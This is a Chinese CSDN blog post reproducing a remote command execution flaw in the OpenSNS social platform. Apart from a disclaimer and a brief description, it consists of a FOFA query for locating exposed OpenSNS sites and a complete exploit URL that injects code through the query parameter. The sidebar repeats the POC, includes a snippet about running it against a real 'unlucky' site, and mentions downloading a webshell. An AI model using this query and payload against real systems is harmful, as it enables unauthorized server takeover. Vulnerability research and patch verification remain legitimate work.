漏洞复现 || OpenSNS远程命令执行漏洞

最新推荐文章于 2023-12-01 09:44:11 发布
最新推荐文章于 2023-12-01 09:44:11 发布
阅读量678 收藏 1
点赞数 1
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: 漏洞复现 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/131679714
版权
本文详细介绍了OpenSNS的一个远程命令执行漏洞,该漏洞源于tp3框架下query参数的变量覆盖问题。文章首先声明了仅供学习使用,禁止非法活动。接着,作者阐述了漏洞的具体描述,指出在weibo/share/sharebox接口的GET请求中,攻击者可利用此漏洞执行任意命令。最后,提供了资产确定和漏洞复现的步骤,包括如何构造POC来触发远程命令执行。
摘要由CSDN通过智能技术生成

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

漏洞描述

opensns是基于tp3开发的,仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。

资产确定

fofa:icon_hash="1167011145"

漏洞复现

1.执行如下POC可执行远程命令

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()

在这里插入图片描述

丢了少年失了心1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
OpenSNS开源社交系统
09-17
OpenSNS一款有“身份”的开源免费SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版等多种平台,可以为客户快速搭建社交网站。2015年1月28日ThinkOX 正式更名为 OpenSNSOpenSNS v3.0 更新的具体内容: 【修改】后台采用基于Bootstrap 3.x的高级管理控制面板主题:AdminLTE,AdminLTE - 是一个完全响应式管理模板。基于Bootstrap3框架,界面简洁清爽,易于使用。 【增加】行为日志新增筛选和导出功能,可以根据行为和日期筛选自己想要的数据、导出功能也便于对数据进行处理和备份。 【增加】新增排行榜,分别是粉丝排行,积分排行,连签排行和累签排行。 【增加】新增签到日历,清晰跟踪记录自己的“足迹” 【增加】后台新增统计模块,包括网站统计,活跃用户统计,留存率统计,流失率统计和充值用户统计。 【增加】用户组新增有效期。有效期为选填项,选择后用户组将在到期后自动关闭。便于网站开展临时或短期活动时使用。 【调整】邀请机制优化,告别繁琐的操作,注册后用户即可获得专属自己的链接。 【调整】公告系统优化,新版公告系统解决了无法与主题很好兼容的问题,可选择是否强制推送,强制推送的公告将以弹窗的形式推送给用户,而没有选择强制推送的公告将以系统消息的形式推送给用户,可查看有多少人,哪些人查看了公告。 【调整】签到插件优化,现在签到可以绑定多事件 【调整】前台UI进行了大的调整,修改了配色和主题、登录注册和微博 【调整】消息系统全面升级,以会话的形式对消息进行分类,支持模板消息 【调整】优化身份创建,新增身份创建向导 【新增】新增全站搜素 【新增】管理员现在可以修改编辑网站用户的部分资料
OpenSNS开源社交系统 v5.7.0
10-14
OpenSNS一款有身份的开源SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版
opensns综合性社交软件系统存在远程命令执行高危漏洞
weixin_68647219的博客
08-01 3485
opensns综合性社交软件系统远程命令执行高危漏洞,该漏洞是由于漏洞入口在 weibo/share/sharebox通过 get请求提交query参数存在变量覆盖,可能导致攻击者通过漏洞发送特定的请求包执行任意命令
OpenSNS开源社交系统--文件上传渗透测试复现
CNXBDSa的博客
08-19 1612
前提:在先知社区里面偶然看见了这个漏洞,咱也想试试,就下载了开源的码进行了本地的复现 源码信息:OpenSNS开源版 漏洞类型:后台getshell 下载地址:http://www.opensns.cn/home/index/download.html 漏洞文件:./Application/Admin/Controller/ThemeController.class.php 第170行 可参考这下载安装使用https://www.w3cschool.cn/opensnscourse/laxp1pnw.htm
OpenSNS后台文件上传漏铜分析
weixin_30369087的博客
07-06 303
前言   这几天正在想找个文件上传漏洞分析一波,以加深对文件上传漏洞的理解,正好看到FreeBuf的一片文章记对OpenSNS的一次代码审计,由于其只对漏洞进行复现,故在此进行代码层面的分析。 漏洞分析   已知漏洞产生点:./Application/Admin/Controller/ThemeController.class.php 第170行      跟入upload函数(...
OpenSNS 远程执行任意命令漏洞
最新发布
未花的博客
12-01 358
status必须等于1,值里必须要app、model、method
Opensns 命令执行漏洞(CNVD-2021-34590)
小小猪的博客
12-29 3578
Opensns 命令执行漏洞(CNVD-2021-34590) 漏洞描述: OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令 影响版本: OpenSNS v5 环境搭建: 在线环境 地址 访问首页 构造poc /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[m.
opensns 命令执行 (CNVD-2021-34590)漏洞复现
weixin_42675091的博客
09-23 1344
opensns 命令执行 (CNVD-2021-34590)漏洞复现
opensns v6.2.0前台RCE漏洞分析
weixin_40484719的博客
10-16 2958
最近准备进一步学习下代码审计,因此打算找些历史漏洞分析学习下。(啥时候我也能挖出前台rce呢 本次漏洞的入口点在于 Application/Weibo/Controller/ShareController.class.php的shareBox方法。 Application/Weibo/Controller/ShareController.class.php share控制器获取外部输入$query,并将它用parse_str解析后交给$array,这里其实就相当于传入了一个数组。接下...
OpenSNS-a5
11-08
不过,由于源码开放,用户和开发者需要注意及时更新到最新版本,以修复可能存在的安全漏洞。 总的来说,OpenSNS"a5"版本是一个强大的社交网络建设工具,它不仅提供了丰富的社交功能,还允许用户根据自身需求进行...
OpenSNS开源社交系统 v5.1.0
11-29
OpenSNS一款有身份的开源SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版
OpenSNS微社区 6.0.0.zip
05-27
OpenSNS微社区是一款综合性社交软件,您可以使用OpenSNS快速搭建一个类似新浪微博一样的功能强大的社交网站,您的社交网站也可以在微信中被访问,还支持苹果和安卓手机通过APP的形式使用,除此之外,OpenSNS还提供云市场进行功能扩展,大量的扩展让你的网站如虎添翼。OpenSNS微社区 6.0.0 更新日志:2018-09-11[修复]原生支付配置;[修复]伪静态下,论坛帖子翻页功能;[修复]论坛用户权限限制功能;[优化]聚合首页活动栏的介绍显示字数。
OpenSNS_2.7.1
12-17
OpenSNS是一款基于OneThink框架的免费开源社交网络软件,版本为2.7.1。这个平台设计轻量级,旨在构建一个集社交、文化、用户中心功能于一体的框架。OpenSNS提供了丰富的社交功能,包括但不限于用户互动、内容分享、...
OpenSNS开源社交系统 v5.3.0
12-16
OpenSNS开源社交系统是一款专为构建具有身份认证功能的社交网络平台而设计的软件解决方案。版本v5.3.0代表了该系统的最新迭代,它集成了多种社交媒体功能,旨在提供一个全方位的社交体验。以下是对这个系统及其组件...
一次渗透测试......OpenSNS漏洞
giaogiao123的博客
08-09 1440
fofa上直接找,找到某倒霉的站。 直接搜索OpenSNSv 6.2 首先开始试一试前台rce index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id
openSNS(V2版本) 用户身份切换可能产生的bug以及正规流程
F_shan的博客
07-29 943
openSNS V2版本注册用户的身份切换有一个严格的流程,不是通过这个流程切换用户身份会造成登入和提示身份未审核或禁用提示,影响体验。在此我会给出身份切换的流程:
opensns html5,记对OpenSNS的一次代码审计
weixin_29289821的博客
06-28 295
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。我在FreeBuf上每天都可以学到很多新思路新技术,感谢这个平台,为了回馈FreeBuf的小伙伴们,写下这篇文章,希望在可以为奋斗在网络安全路上的小伙伴们提供一些新奇小思路,其实挖洞并不难,也希望大家能把分享的精神发扬光大。概述OpenSNS是想天科技开发的一款综合性社交软件。您可以...
vulfocus——opensns命令执行(CNVD-2021-34590)
m0_62063669的博客
09-29 674
此处的cmd= 只能传参1个,在使用'system'函数空格会导致执行失败,故而使用php中的copy函数直接下载webshell实现RCE。OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。copy(远程文件下载地址,需要下载到的地方)4.也可以通过下载webshell,用工具连接。2.发送特定请求包可以执行任意命令。3.在phpinfo找到flag。
opensns功能详解
weixin_30765475的博客
06-07 177
opensns功能详解 opensns功能详解 软件工程 轮播功能 此项可以用来发布广告、新闻等。对于实验室网站而言,可以用来放实验室最新的招生信息等内容。在后端,我们可以设置图片的开始生效时间、失效时间,同时也可以看到点击量等信息。 网站前端示意图如下: 网站后端操作如下: 发布动态功能 此项类似于QQ空间说说、新浪微博。用户可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值